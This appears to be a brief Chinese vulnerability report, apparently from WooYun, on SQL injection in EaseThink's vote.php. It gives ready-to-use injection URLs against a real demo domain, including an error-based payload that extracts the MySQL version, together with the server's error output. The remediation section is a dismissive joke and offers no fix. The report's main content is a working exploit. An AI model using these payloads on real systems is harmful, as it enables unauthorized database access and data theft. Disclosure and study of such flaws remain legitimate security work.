会记录cookie ，请求一次清除一下cookie。
http://demo.easethink.com/vote.php?act=dovote&name[a%27][111]=aa
 
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] => Array ( [errno] => 1064 ) )
 
 
利用直接暴错方式注入 www.2cto.com
 
漏洞证明：http://demo.easethink.com/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa
 
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = 1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# ) [2] => Array ( [error] => Duplicate entry '|5.1.48|1' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )

修复方案：您懂得!
 
 
作者kobin97@乌云